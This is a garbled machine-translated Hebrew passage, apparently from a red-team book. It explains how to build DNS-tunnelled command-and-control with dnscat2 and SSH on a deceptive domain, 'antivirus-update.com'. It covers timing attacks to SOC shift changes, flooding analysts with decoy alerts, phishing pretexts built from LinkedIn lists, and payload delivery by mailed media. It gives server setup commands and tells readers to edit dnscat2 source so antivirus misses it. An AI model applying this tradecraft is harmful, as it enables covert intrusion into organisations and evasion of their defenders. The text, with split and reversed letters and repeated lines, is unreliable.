‫המ טען ש לנו ) כ שאתה מ ח לי ט מה זה( צריך להיות מ סוג ל לת ק שר‬
‫‪ C2‬ש לנו באמצעות שאי לתות ‪ DNS‬ר קור סי ביות שהן בעצמן הנתונים המת ק ב לים‪ .‬ב‬
‫בנו סף ל כך‪ ,‬מידע צריך לע בור ב חזרה למ טען כנתוני ‪DNS‬‬
‫בדרך כ ל שהי‪ .‬היתרונות הם שזהי חתוך את א ב ט חת הג בו ל ש להם כמו‬
‫ס כין לוה טת דרך חמאה והיא חמ קנית‪ ,‬אם כי לא ניתנת לזיהוי‪.‬‬
‫תזד ק ק ל כמה ד ברים לפני שתו כ ל להת חי ל ל בנות את הפתרון הזה‪:‬‬
‫שם דומיין שנר שם במיו חד ע בור המת קפה‪ .‬זהי כו ל להיות כ ל ד בר‬
‫אתה רוצה‪.‬‬
‫שרת ‪ C2‬ש לנו צריך להיות סמ כותי ע בור שם הדומיין הזה‪.‬‬
‫י ש ליצור שירות נו סף שפוע ל ע ל שרת ‪ C2‬ש לנו ו‬

‫מת חזה ל שירות ‪ DNS‬בעוד שמ טרתו הי חידה היא לע שות זאת‬
‫לת ק שר עם המ טען ש לנו‪.‬‬
‫הת קפה זו אינה מו שג חד ש אך אינה מו בנת הי ט ב‪ .‬ההו כ חה הרא שונה ש ל‬
‫הרעיון נוצר ע לידי ‪ DNS‬וגורו הא ב ט חה דן קמינ ס קי ב שנת ‪ 2004‬עם‬
‫‪OzymanDNS.‬הרעיון נ בנה ע לידי ‪ Tadek Pietraszek‬עם ‪dnscat,‬א ב ל זה‬
‫ה כ לי מוג ב ל ב כך שהוא דור ש ‪ Java VM‬כדי לפעו ל‪ .‬רון בוו סיצר את ‪dnscat2‬‬
‫ליי שם ו להדגים מנהור ‪ DNS‬במיו חד ע בור סוג זה‬
‫מ טרות שאתה צריך‪ .‬זה גמי ש‪ ,‬זה עו שה את מה שאתה צריך‪ ,‬ואת ח ל ק המ טען‬
‫ש ל קוד המ קור הוא ב‪ ,C-‬אז אתהי כו ל להר כי ב אותו ע ל כ ל מה שאתה רוצה ו ל שנות‬
‫זה כדי ‪-AV‬ה ש לאיראה את זה‪.‬‬
‫ה‪dnscat2 -‬נ כנ ס למע שה ר ק דרך ‪DNS -‬דינמי והיפוך‬

‫מנהרות אינן נתמ כות‪ ,‬וגם לא הע ברת ק בצים‪ .‬זה לא בעיה כאן א ב ל כמו‬
‫אנ חנו ר ק הו ל כים ל ש ל ב ו לפרו ס אותו עם מ טען ‪ SSH‬מ ש לנו‪ ,‬מה שמאפ שר‬
‫הע ברת ק בצים מאו ב ט חת ו ביצוע פ קודות‪ .‬מ ח בר התו כנה ח כם‬
‫להזהיר מפני אמון בהצפנה המו בנית‪ ,‬מ כיוון שהיא תוצרת בית‪ .‬בזמן שזה כן‬
‫כ כ ל הנראהיותר מ טו ב מ ספי ק למ טרותינו‪ ,‬אנ חנו מ בצעים מנהור ש ל ה‪HSS-‬‬
‫פרו טו קו ל כך שה בעיה הזו נפתרת גם ע בורנו‪.‬‬
‫נר שום את שם הדומיין ‪ antivirus-update.com‬וניצור שרת ‪ C2‬ש לנו‬
‫שרת ה שמות ה סמ כותי ע בורו‪ .‬הפעם כ שאני רץ ל חפור‪ ,‬אני מ ק ב ל את זה‪:‬‬
‫‪dig +trace test.antivirus-update.com‬‬
‫‪.‬‬ ‫‪14609 IN NS a.root-servers.net.‬‬

‫‪.‬‬ ‫‪14609 IN NS b.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS c.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS d.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS e.root-servers.net. .‬‬
‫‪14609 IN NS f.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS g.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS h.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS i.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS j.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS k.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS l.root-servers.net.‬‬
‫‪.‬‬ ‫‪14609 IN NS m.root-servers.net.‬‬
‫;; קי ב ל ‪ 228‬בתים מ‪ (4.4.8.8)35#4.4.8.8-‬תוך ‪17‬א לפיות ה שנייה‬
com. 172800 IN NS i.gtld-servers.net.

com. 172800 IN NS m.gtld-servers.net.
com. 172800 IN NS l.gtld-servers.net.
com. 172800 IN NS e.gtld-servers.net.
com. 172800 IN NS g.gtld-servers.net.
com. 172800 IN NS b.gtld-servers.net.
com. 172800 IN NS d.gtld-servers.net.
com. 172800 IN NS a.gtld-servers.net.
com. 172800 IN NS f.gtld-servers.net.
com. 172800 IN NS h.gtld-servers.net.
com. 172800 IN NS j.gtld-servers.net.
com. 172800 IN NS c.gtld-servers.net.
com.
172800 IN NS k.gtld-servers.net.
‫ א לפיות ה שנייה‬901-‫( ב‬33.72.21.202)35#33.72.21.202-‫ בתים מ‬504 ‫;; קי ב ל‬
antivirus-update.com.
IN NS newyork.antivirus
172800 update.com.
IN NS paris.antivirus
172800 update.com.
IN NS london.antivirus
antivirus-update.com. 172800 update.com.
085-‫( ב‬03.871.25.291)35#03.871.25.291-‫ בתים מ‬155 ‫;; קי ב ל‬

‫ג ברת‬
172799 paris.antivirus-update.com. IN ‫ ס‬.‫נ‬

172799 newyork.antivirus-update.com. IN ‫ ס‬.‫נ‬
172799 london.antivirus-update.com. IN ‫ ס‬.‫נ‬
‫ מה ש ח שו ב הוא שה‬.‫ה בדי קה כמאר ח לא קיימת א ב ל זה לא מ שנה‬

‫ ש לנו‬2C-‫ה ב ק שה לפתרון המאר ח מופנית במע לה ה שר שרת עד שהיא מגיעה ל‬
‫ה כי‬DNS. ‫ בדרך זו ניתן ל טמון נתונים בתוך ב ק שות‬.‫שרת‬
‫זהי כו ל ל שמ ש לא ח סון‬TXT. ‫הוא ר שומת‬DNS ‫סוג גמי ש ש ל ר שומת‬
‫נתונים שרירותיים שניתן לה שתמ ש בהם כדי ל ספ ק מידע ע ל הת חום ש בו‬
‫ זהי כו ל לה כי ל כ ל מידע שאתה‬.(‫ עוד ע ל כך בהמ שך‬SPF - ‫שא לה ) כגון ר שומות‬
‫ אתהי כו ל‬,‫ כתוצאה מ כך‬.‫רוצה ) במג ב לות הגוד ל( וניתן לעד כן אותו תוך כדי תנועה‬
3.1. ‫ ראה איור‬DNS. ‫גם ל כ לו ל נתונים ופ קודות בתוך תגו בת‬
‫איור ‪3.1:‬היופי בהגדרה הזו הוא שאם ה‪ 2C-‬ש לך מופרע ע לידי פעו לות א ב ט חה‪,‬‬
‫אתהי כו ל ל כוון את ‪-DNS‬ה ש לך ל שרת א חר‪.‬‬
‫י שנן ש לו ש דר כים ש בהן ניתן לזהות מת קפה כזו‪:‬‬
‫זיהוי תו כנות זדוניות‪/‬אנ טי וירו ס מ בו ס ס מאר ח‪ .‬במ קרה זה‪ ,‬אתהי כו ל להר כי ב‬
‫את המ טען ש ל ‪ dnscat2‬ב כ ל דרך שתרצה להימנע מ חתימות ‪AV.‬‬
‫ניתו ח תנועה מ בו ס ס חתימה‪ .‬לא ס ביר א ב ל לא ס ביר‪.‬‬
‫זיהוי אנומ ליות ‪ DNS‬מ בו ס ס היורי ס טיות‪ .‬בהת ח ש ב ב כך ש ל‪SND-‬י ש ב לי בה פונ קציה‬
‫פ שו טה מאוד ‪ -‬פתרון שמות מאר חים ל כתו בות ‪IP -‬י שנן דר כים ש בהן התע בורה‬
‫הזוי כו לה להיראות ח שודה ע ל הג בו ל‪ .‬אנ חנו פותרים הר בה מאר חים באותו דומיין‬
‫ברצף מהיר‪ ,‬כמו גם מ בצעים הר בה ב ק שות חיפו ש ‪ TXT.‬באופן כ ל לי‪ ,‬למאר ח ל קו ח‬
‫אין הר בה סי בות אפי לו ל ב ק ש ר שומות ‪ TXT.‬ב שום ד בר מ ל בד ס בי בה א ב ט חה‬
‫ג בוהה‪ ,‬כנראה ש לא תו כ ל לדאוג שרמת ה בדי קה הזו לא בוצעה‪ ,‬א ב ל הנה אני ח ש כן‬
‫ואת כנן את הת קיפה ש לנו בהתאם‪.‬‬
‫הערות ע ל זיהוי חדירה ופעו לות הא ב ט חה‬

‫מֶ ְר ּכָז‬
‫די ברנו ארו כות ע ל הצורך ל שמור ע ל מ טענים מת חת לרדאר ש ל מוצרי אנ טי‪-‬וירו ס‬
‫או תו כנות זדוניות‪ .‬עם זאת‪ ,‬זהו ר ק קצה ה קר חון‪ .‬מער כות מודרניות לזיהוי פריצות‬
‫הן מת קדמות‪ ,‬אינ ט ליגנ טיות ו שיתופיות וי כו לות לע בד מידע ע ל אירועים כמע ט‬
‫מ כ ל סוג ש ל שרת‪ ,‬מ כ שיר או ק טע ר שת‪ .‬במ קרה הפ שו ט ביותר‪ ,‬זה כו ל ל ח שודים‬
‫שרת‪ ,‬מ כ שיר או פ ל ח ר שת‪ .‬במ קרה הפ שו ט ביותר‪ ,‬זה כו ל ל תע בורה ח שודה ) כמו‬
‫סרי קתיציאות( או מ ספר כני סות כו ש לות ברציפות בנת ב ש ל סי ס קו‪ .‬ניתן ל כ לו ל‬
‫ו להגדיר התנהגות ספציפית כאירוע א ב ט חה ו ל ש ל ב אותה במער כת הני טור המר כזית‪.‬‬
‫‪IDS‬ת ק ב ל את הנתונים מ ש לו שה מ קומות‪:‬‬
‫מער כת זיהוי חדירת ר שת )‪ (NIDS‬ע בור ממ ש קי ר חרו ח פ סי ביים לניתו ח נתוני מ טען‬
‫וני טור א חר פעי לות שע לו לה להיות זדונית‪-NIDS .‬הי ק ב ל את הנתונים ש לוי שירות‬
‫מהמתג באותו מ ק טע דרך טוו ח פיזי‪ ,‬ה ק שה אויציאת מראה‪ ,‬כך ש לא תעצור את‬
‫רו ח ב הפ ס ה לי בה ש ל הר שת ש לך‪.‬‬
‫מער כת זיהוי חדירות מ בו ס סת מאר ח )‪ (HIDS‬לאיתור בעיות בנ קודות קצה‪ ,‬כו ל ל‬
‫ני טור ש למות ה ק בצים‪ ,‬בדי קות ‪ rootkit‬ו בדי קות הרי שום ש ל ‪Windows.‬‬
‫ה‪ SDI-‬עו ק ב א חר תע בורת הר שת ע בור התנהגות זדונית‪ ,‬הודעותיומן מער כת‬

‫ופעי לות מ שתמ שים‪.‬‬
‫זה נהדר‪ ,‬א ב ל ב כ ל ר שת נתונה‪ ,‬זהייצר הר בה נתונים שי ש לנ טר‪ ,‬לפעו ל לפיהם‬
‫ו לא ח סן אותם לצורך ניתו ח או מ ח קר ארוך טוו ח‪ .‬כאן נ כנ ס לתמונה מר כז התפעו ל‬
‫הא ב ט חה ‪(SOC).‬‬
‫צוות ‪SOC‬‬
‫הר כ ב צוות ‪ SOC‬מ שתנה מאוד בהתאם לצר כים ו לת קצי ב ש ל הארגון המדו בר‪ .‬ח ברות‬
‫מ סוימות מעדיפות להע ביר את ה שירותים ה ל לו למי קור חוץ לצד ש לי שי המתמ חה‬
‫בני טור הגנתי בר שת‪ .‬עם זאת‪ ,‬במ קרה ש ל בנ ק בינ לאומי‪ ,‬אתהי כו ל להני ח שהצוות‬
‫ייראה כך‪:‬‬
‫מנה ל מ שמרת ‪-‬א חראי ע ל מ סירות בין מ שמרות ו חו בות נ לוות כגון תדרוך למ שמרת‬
‫ה באה ע ל המצ ב התפעו לי הנו כ חי‪ ,‬אירועי א ב ט חה מתמ ש כים ו כדומה‪.‬‬
‫אנ לי ס טים ב שורה הרא שונה ש ל ‪ SOC -‬עו בדים במ שמרות ‪24/7‬תוך ני טור ‪SIEM‬‬
‫)ניהו ל אירועי א ב ט חה( ‪ -‬עוד ע ל כך בעוד ד קה‪ .‬אם מזוהה הת קפה‪ ,‬כר טי ס מוע לה‬
‫ומוע בר למנת חי ה קו ה שני‪.‬‬
‫אנ לי ס טים ב שורה ה שנייה ש ל ‪SOC -‬זמינים גם ‪24/7,‬אם כי לא בה כר ח באתר‪.‬‬
‫י ק בע אם ה כר טי ס הוא חיו בי שגוי או שי ש צורך לה ס לים אותו לאנ לי ס טים ש ל ה קו‬
‫ה ש לי שי‪.‬‬
‫אנ לי ס טים ש ל קו ש לי שי ש ל ‪SOC -‬זמינים ט כנית ‪ 24/7‬בהתאם לאופי האירוע‪ .‬אם‬
‫ה כר טי ס הגיע לנ קודה זו‪ ,‬צפוי להיות אירוע א ב ט חה רציני מתמ שך או תר חי ש "יורה‬
‫פעי ל"‪.‬‬
‫איך ‪-SOC‬ה עו בד‬

‫איך ‪-SOC‬ה עו בד‬
‫ח שו ב לה בין כיצד פוע ל ‪ SOC‬מ כיוון שא לו האנ שים שאתה צריך לנצ ח בתרגי ל דוגמנות‬
‫‪ APT.‬ל לאיוצא מן ה כ ל לי ש להם ס לידה חז קה מ בו חני חדירה‪ ,‬ש כ ל הד ברים שווים הם‬
‫מו בנים ל ח לו טין‪ .‬ראה איור ‪3.2.‬‬
‫איור ‪ 3.2:‬מערך ני טור פריצה ב סי סי‪.‬‬

‫הנ קודה ה ח שו בה ב סעיף זה היא שזמן התגו בה ) לפי ה שורה הרא שונה( אינו זהה לזמן‬
‫התגו בה )הת קופה ש בין זמן התגו בה לפתרון האירוע(‪ .‬לא חר שאירוע סומן‪,‬י ש ל בצע‬
‫סדרה ש ל צעדים כדי לגיי ס תגו בה‪.‬‬
‫זמן תגו בה ו שי בו ש ש ל ‪SOC‬‬

‫זמן התגו בה האפ ק טי בי ש ל ‪-SOC‬ה מ שתנה‪ .‬ב שעה הא חרונה ש ל ה ח לפת מ שמרת‬
‫ב שעות ה בו קר המו קדמות תהיה כנראה ה שעה ש בה זמן התגו בה ש ל ‪SOC‬הוא‬
‫האי טי ביותר‪ .‬אם אתה חו שד שהת קפה צפויה למ שוך ת שומת ל ב מה‪ COS-‬ואינך‬
‫מ סוג ל לג לות את זמני מ סירת המ שמרות‪ ,‬שאפו שההת קפה תע לה לאוויר בין ‪3:00‬‬
‫ב בו קר ל‪ 00:4-‬לפנות בו קר‪.‬‬
‫הת קיפה תע לה לאוויר בין ‪ 3:00‬ב בו קר ל‪ 00:4-‬לפנות בו קר‬

‫ניתן גם ל ש ב ש ‪ SOC‬ו להגדי ל את זמן התגו בה האפ ק טי בי בדר כים א חרות‪ .‬ש ל ב הת קפה‬
‫ע ל ח ל ק א חר בת שתית היעד ) כגון שרתי האינ טרנ ט הפונה לצי בור( וייצר תע בורה‬
‫ר בה‪ .‬סור קי פגיעות והת קפות אימות ב כו ח ג ס ממ ספר כתו בות ‪IP‬הן הת ח לה טו בה‪.‬‬
‫שואף ל שים כמה שיותר כר טי סים בינך ל בין ההת קפה ש לך‪.‬‬
‫הת חמ קות ‪-IDS‬מ‬
‫בפר ק הרא שון למדת ע ל ה ח שי בות ש ל הת חמ קות מאנ טי וירו ס‪ .‬אתהי כו ל לע שות‬
‫מ שהו דומה עם ‪IDS.‬זה מועי ל ל בו חן להיות מ סוג ל ל ש כפ ל תנאייעד במע בדה‬
‫באמצעות ט כנו לוגיית ‪ VM.‬ל כ ל ה ספ קים הפופו לריים ביותרי ש גר סאות ני סיון שתו כ ל‬
‫להוריד ו ל ש ח ק איתן ‪-‬אינך צריך ל ש כפ ל ר שת מור כ בת אך הי כו לת לראות כיצד ‪IDS‬‬
‫מגי ב לתע בורה ש לךי כו לה ל ח סוך לך ע בודה ר בה ו ל למד הר בה ע ל פעו לות א ב ט חה ‪.‬‬
‫נ כון ל כתי בת שורות א לה )ו לעניות דעתי(‪ ,‬ה ספ ק ה טו ב ביותר במר ח ב הזה הוא‬
‫‪AlienVault.‬‬
‫ה ט כנו לוגיה ש להם מ קיפה ה כ ל ‪-HIDS‬ו ‪-NIDS‬מ ועד ‪SIEM.‬זהו או סף ש ל ט כנו לוגיות‬
‫שנ ל ק חו ממ קומות שונים ומ שו ל בות‪ SOCs .‬ר בים מ בו ס סים ע ל ה כ לי הזה והואי כו ל‬
‫למ שוך נתונים כמע ט מ כ ל ד בר )אם הוא לאי כו ל‪ ,‬אתהי כו ל ל כתו ב תו סף כך שיע שה‬
‫זאת(‪ .‬הורד את מוצר ‪-USM All-in-One‬ה ש להם כגר סת ני סיון ב חינם ו ש ח ק איתו‪,‬‬
‫ה בן את שי לו ב )‪-OTX (Open Threat eXchange‬ה ש לו ו כיצד זה מ שמעותי בעו לם‬
‫ש בו מודיעין כזה צריך להיות מ שותף ע ל ב סי סיומי‪.‬‬
‫ההיגיון מא חורי ה ב חירה ל בנות את ת שתית ה‪ 2C-‬ב ספר זה ס בי ב פרו טו קו ל ‪ SSH‬לא‬

‫היה ר ק הנו חות שהוא מציע ב כך שהוא כ בר מ כי ל ח ל ק גדו ל מהפונ קציונ ליות שאתה‬
‫צריך‪ ,‬א לא בג ל ל שזה נראה כמו תע בורה לגי טימית לני טור ר שת‪ .‬זה לא מ שנה כמה‬
‫מנהרות עו ברות ע ל ה חי בור או לאיזה כיוון הן הו ל כות ‪-‬זה עדיין נראה כמו חי בור ‪SSH‬‬
‫יוצא‪ ,‬א שר כ ש לעצמו לאיפעי ל אזע קה )א לא אם כן מוגדרת מדיניות ספציפית לע שות‬
‫אז‪ ,‬וזה מאוד לא ס ביר(‪.‬‬
‫חיו בי שווא‬
‫נ קודה א חרונה‪ ,‬בהת ח ש ב במ ספר האירועים שייווצרו מו ל מ שא בי ‪-SOC‬ה והצורך ש לו‬
‫ל ח ס ל תוצאות כוז בות‪ ,‬נ כ סים המנו טרים ע לידי ‪ IDS‬מ ק ב לים ערך מ ספרי המוע בר‬
‫לנו ס חה כא שר ה ט כנו לוגיה מ ק ב לת ה ח ל טה האם אירוע נ ח ש ב ראוי ל סימון ‪ -SIEM‬באו‬
‫לא‪ .‬ערך נ כ סי כו ל להיות ‪)0‬ה כי פ חות ח שו ב( עד ‪)5‬ה כי ח שו ב(‪ .‬הנו ס חה לו ק חת‬
‫ב ח ש בון את עדיפות האירוע )גם ‪ 0‬עד )‪ 5‬ואת המהימנות ש ל זיהוי האירוע ‪ (0‬עד ‪10).‬‬
‫הנו ס חה נראית כמו‬
‫ואת המהימנות ש ל זיהוי האירוע ‪ (0‬עד ‪10).‬הנו ס חה נראית כך‪:‬‬
‫זה מאפ שר למע שה ל ח ל ק את הא ב ט חה לא חוזונים ו ל סווג ו להגי ב בהתאם‪ .‬זה ב סדר‬

‫)א כן ה כר חי( במידה מ סוימת‪ .‬ה בעיה היא ש לא תמיד ברור מה צריך להיות שווי הנ כ ס‪.‬‬
‫במי לים א חרות‪ ,‬הת קפה שהופע לה ע ל נ כ ס בע ל ערך נמוך ו בעדיפות עם כ ל ל שאינו‬
‫נ ח ש ב לאמין מ ספי ק לא ת סומן‪.‬‬
‫בתר חי ש ‪ APT‬ש בוית כן שתו קףיצ טרך להי שאר מו סתר במ שך זמן ר ב תוך הימנעות‬
‫מזיהוי ב ס בי בה מפו ק חת א ב ט חה‪ ,‬התו קף צריך ל שאוף להתפ שר ע ל נ קודות קצה שיהיו‬
‫בע לות ערך הנ כ ס הנמוך ביותר כפי שניתן באופן ס ביר לה שתמ ש בו לצורך בדי קה‬
‫נו ספת ‪ .‬מדפ סות מודרניות‪ ,‬למ ש ל‪,‬יהיו מ חו ברות לר שת ו בע לות פונ קציונ ליות ש כנראה‬
‫תתר ח ב מע בר למה שהמ כ שיר צריך‪ .‬כ כא לה‪ ,‬ניתן לה שתמ ש בהם לא ח סון ק בצים‪,‬‬
‫כ לים‪ ,‬ו במ קרים מ סוימים הת קפות א ספ קה‪ .‬נת ב ש ל סי ס קויי ח ש ב כ כ ל הנראה לנ כ ס‬
‫בע ל ערך ג בוה‪ ,‬אך הני טור בדרך כ ל ל צריך להיות מ כוון ב קפידה כדי למנוע עודף חיו ביות‬
‫כוז בות‪ .‬סרי קתיציאה ק לה שמגיעה ממ כ שיר ‪ Cisco‬לא ת סומן או תי סגר מיד ע לידי‬
‫צוות ‪ SOC.‬עם זאת‪ ,‬לנת בים מודרניים ש ל סי ס קו מות קן כ ברירת מ חד ליי שום ש ל שפת‬
‫ה ס קריפ טים ש ל ‪ TCL‬ו למרות שזה לאיי שום ש לם ) למר בה הצער מודו ל ‪Expect‬אינו‬
‫נתמך למ ש ל(‪ ,‬הוא עדייןי כו ל ל שמ ש לת קיפות ס קריפ טים ו לה ק ל ע ל רי קו ל נמוך ואי טי‪.‬‬
‫נאמר מ ספי ק‪ .‬הגיע הזמן ל ח שו ב איך אנ חנו הו ל כים ל ספ ק את המ טען ש לנו‪.‬‬

‫מ ש לו ח מ טען ח ל ק ‪ III:‬מדיה פיזית‬

‫כמע ט ש ל לנו את הר שת בתור ו ק טור בר‪ -‬קיימא ש ל הת קפה ודוא" ל עם כ ל סוג ש ל‬
‫ק בצים מצורפים הו לך להיות נתון ל בדי קה ני כרת‪ .‬עם מה זה מ שאיר אותנו? הר בה‪,‬‬
‫א ב ל למ ב חן הזה אנ חנו הו ל כים ל ל כת ל בית ה ספר הי שן‪ .‬הדרך ה ק לה ביותר לה כני ס‬
‫מ טען ל ס בי בה בע לת א ב ט חה פיזית ג בוהה היא לע בור ל ט כנו לוגיה נמו כה‪ .‬ח בי לות‬
‫‪ FedEx‬לאיע ברו ניתו ח ע לידי מער כות למניעת תו כנות זדוניות ע ל ג בו ל ‪-‬הןיימ סרו‬
‫ל שו ל חן ש ל מי שהו‪.‬‬
‫סוג חד ש לגמרי ש ל הנד סה ח ברתית‬

‫י ש לך כאן הזדמנויות כמע ט ב לתי מוג ב לות להת קפה ש ל הנד סה ח ברתית ואם אתה‬
‫מתאמץ מע ט אתה מגיע עם כמה באמת לותיעי לות מאוד‪.‬‬
‫הצוות מוזהר כ ל הזמן לצפות במה שהם לו חצים אך לא במה שהם פות חים בדואר‪.‬‬
‫אתהי כו ל ל ש לו ח את המ טען ש לךי שירות ע ל די ס ק אופ טי או כונן אצ בע‪ ,‬או שאתה‬
‫י כו ל ל ק ב ל מ כת ב בע ל מראה ר שמי המ ספ ק הוראות למ טרה‪ .‬אתהי כו ל למ קד צוותים‬
‫שונים ב בניינים שונים ו במ ח ל קות שונות‪ ,‬ו לצמצם את האפ שרות שמי שהוי שווה הערות‪.‬‬
‫הדרך ה ק לה ביותר ל בנות ר שימתיעדים היא הר שת ה ח ברתית הע ס קית ‪LinkedIn.‬‬
‫אינך צריך ל סרו ק בפרופי לים ש ל אנ שים ‪ -‬פ שו ט הזן את שם הע ס ק ות ק ב ל ר שימה ש ל‬
‫כ ל מי שעו בד שם שנר שם לאתר ואת שם הע בודה ש לו‪ .‬אתהי כו ל לגזור את כתו בות‬
‫הדוא" ל ש להם ע לידי ק ביעה מהי המו ס כמה באמצעות חיפו שי ‪Google‬או חיפו שי‬
‫‪PGP‬או איך שתרצה ו לא חר מ כן לה חי ל זאת ע ל ר שימת ה שמות‪.‬‬
‫פרופי ל מי קוםיעד‬
‫היעד ש לנו כו ל ל למע לה מ‪ 02-‬מ טה במדינה הזו ב ל בד ) לא מ שנה סניפים קמעונאיים(‬
‫ו ל כ ל בנייןי ש קוד‪ .‬כ ל שו ל חן ב בניין ניתן לזיהוייי חודי בע ק בות קוד זה; לדוגמה‪ ,‬למר כז‬
‫הנתוניםי ש קוד ש ל ‪MZ.‬‬
‫למי שהו ב קומה הר ביעית ש ל מר כז הנתונים הזה בד לפ ק ‪298‬יהיה קוד המ סירה‬
‫היי חודי ש ל ‪MZ4.298.‬זה מאפ שר הפניה ק לה לדואר פנימי‪ ,‬כמו גם נותן למ ב קרים‬
‫)ממפ קדות א חרות( את הי כו לת למצוא מי שהו במהירות בעת ה שתתפות בפגי שות ו כן‬
‫ה לאה‪ .‬מ קו ב ל ב בנ ק ש קוד זהיי כ ל ל ב כותרת הת חתונה ש ל המיי ל‪ .‬אנייודע את זה כי‬
‫ע שיתי הר בה ע בודה ב ש בי לם‪ ,‬א ב ל תו קףיצ טרך לע שות עוד קצת ע בודת רג ליים‪.‬‬
‫שרתי דואר מ סוימיםיגידו לך אם כתו בת אימיי ל חו קית‪ ,‬ח ל ק לא‪ .‬זה ת לוי איך הם‬
‫מגי בים לפ קודת ‪RCPT TO‬ידנית‪ .‬ח ל קירצו‬
‫הגי בו בהודעה לא חו קית ‪ ,‬בעוד שא חרים פ שו טיגי בו ב סדר ואזי קפיצו את ההודעה‪.‬‬
‫זה לא ממ ש מ שנה במ קרה ש לנו‪ ,‬א ב ל תמיד בדו ק מה זה לפני שמת חי לים מ סע דיוג‬
‫ב חנית‪ ,‬כי זה נ חמד ש לא נד חתה אף א חת מההודעות ש לנו כי היה חריג במו ס כמות‬
‫ה שמות‪ .‬שרתי דואר מ סוימיםי ח סמו אותך כ שו ל ח דואר ז ב ל פו טנציא לי אם ה‪ PI-‬ש לך‬
‫צו בריותר מדי מ ש לו חים כו ש לים‪.‬‬
‫אי סוףיעדים‬
‫רא שית ע ליך ל בנות את ר שימת היעדים ש לך‪ .‬מה שאתה רוצה זה ר שימה ש ל כ‪001-‬‬
‫שמות במ ח ל קות שונות‪ .‬זה לא מ שנהיותר מדי באי לו מ ח ל קות ב ש ל ב זה‪ ,‬פ שו ט נ סו‬
‫ל ק ב ל פיזור שווה‪ .‬הנ קודה היא שתצ טרך ליצור עי לה ‪ -‬כ ל עי לה באמת ‪ -‬כדי ל ש לו ח‬
‫דוא" ל לאנ שים בר שימה הזו ו ל ק ב ל תגו בה; התגו בה ת כי ל את קוד ה בנייה האי שי‬
‫המאפ שר לך ל ספ ק את המ טען באופן ספציפי מאוד במ סגרת המו ס כמות המ קו ב לות‬
‫והאמינות ש ל ה בנ ק‪ .‬המ כת ב ה בא‬
‫דןי קר‪,‬‬
‫היה נהדר להתעד כן ‪ -Infosec‬ב ב ש בוע שע בר‪ .‬אם בא לך ל שתות בירה ביום שי שי הזה אני אהיה בעיר‪.‬‬
‫דיי ב‬
‫היא דוגמה פ שו טה שע שויה לעורר את התגו בה ה באה‪:‬‬

‫דיי ב‪,‬‬
‫אני חו ש ב ש טעית בדן!‬
‫ל חיים‪ ,‬דן‬
‫מהנד ס מער כות ‪IT‬‬

‫מער כות ת ש לום‬
‫‪Walton Street MZ2.324‬‬

‫‪23‬‬
‫זה לא מ שנה; תהיהיצירתי‪.‬‬

‫לא חר שתהיה לך ר שימה ש ליעדים‪ ,‬כתו בות ו קודי בנייה‪ ,‬תו כ ל ל ח שו ב מה אתה‬
‫רוצה ל ספ ק‪.‬י ש את ח בי לת המ טען ‪dnscat2/SSH ,‬א ב ל‬
‫אתה צריך לה ל בי ש את זה כמ שהו מ ש כנע ו להגדיר את ה ס בי בה ש לך‪.‬‬

‫כך…‪.‬‬
‫ש ל ב ‪I:‬תצורת שרת בנו סף לת שתית ה‪ 2C-‬ה קיימת ש לך‪ ,‬ע ליך להת קין את צד ה שרת‬
‫ש ל ‪ dnscat2,‬וזה פ שו ט מ ספי ק‪ .‬א למנ ט ה שרת כתו ב כ ס קריפ ט ‪Ruby‬אז אתה ר ק‬
‫צריך לעמוד ב כמה דרי שות מו קדמות‪ .‬ב‪ ,xuniL-‬ה שתמ ש בפ קודה הזו‪:‬‬
‫‪ $ sudo apt-get‬להת קין ‪ruby-dev‬‬
‫כדי לתפו ס את כ לי הפיתו ח ש ל רו בי ו לה שתמ ש בפ קודה הזו‪:‬‬

‫‪server/ $ sudo gem install bundler $ sudo bundle installation‬‬
‫‪$ git clone https://github.com/iagox86/dnscat2.git $ cd dnscat2/‬‬
‫להוריד ‪ dnscat2‬ו להת קין את הת לות ש לו‪ .‬אתהי כו ל להפעי ל את ה שרת פ שו ט ע ל‬

‫ידי הפע לת הפעו לות ה באות )צירוף דומיין ה ספ ק(‪.‬‬
‫‪# ruby ./dnscat2.rb antivirus-update.com‬‬
‫ש ל ב ב'‪ :‬תצורת ל קו ח‬
‫מ כיוון ש ל קו ח ‪ dnscat2‬בה ח ל טיזוהה מה קופ סה ע לידי ‪ AV,‬ע ליך ל בצע כמה שינויים‬
‫במ קור ‪ C‬לפני הידור ש לו‪ .‬שינוי קוד המ קור ש ל קו בץ הפע להיעי ל בע קיפת זיהוי וירו סים‪.‬‬
‫בהתאם ל חתימה‪ ,‬זהי כו ל להיות פ שו ט כמו שינוי ה ט ק ס ט ש ל הודעה כ ל שהי בתוך‬

‫ה קוד‪ ,‬או שזה ע שוי להיות מ סו בךיותר‪ ,‬מצריך שימו ש ב קריאות פונ קציות שונות או‬
‫סידור מ חד ש ש ל ה קוד‪ .‬עיון ב קוד המ קור ש ל ‪dnscat.c,‬תראה מ ספר חתימות פ שו טות‬
‫שיזהו את זה כע ל פו טנציא ל עוין‪ ,‬כו ל ל ח בורה ש ל הצהרות ‪ printf‬שאתהי כו ל ל חיות‬
‫ב לעדיהם ב כ ל מ קרה‪ .‬לדוגמה‪:‬‬
‫{ )‪if(optind >= argc‬‬
‫‪")printf‬הפע לת מנה ל הת קן ‪ DNS‬ל לא דומיין! זהיע שה ר ק‬

‫תע בוד אם אתה\‪;("n‬‬
‫‪")printf‬מת ח בריםי שירות ל שרת ‪")dnscat2.\n"); printf ("\n"); printf‬תצ טרך לה שתמ ש‬
‫ב‪ >=revresdns --‬שרת< אם אינך‪\n");.‬‬
‫‪tunnel_driver = create_dns_driver_internal(group, NULL,‬‬

‫;)‪"0.0.0.0", 53, DEFAULT_TYPES, NULL‬‬
‫}‬
‫ה סר את שורות ‪printf‬א לה ) כמו גם שורות א חרות כא לה מהמ קור(‪ ,‬הר כי ב את ה קוד‬

‫)אני מ שתמ ש ב‪ WGniM-‬א ב ל מ שתמ ש ‪ -Visual Studio‬באם אתה חיי ב(‪ ,‬וראה מה‬
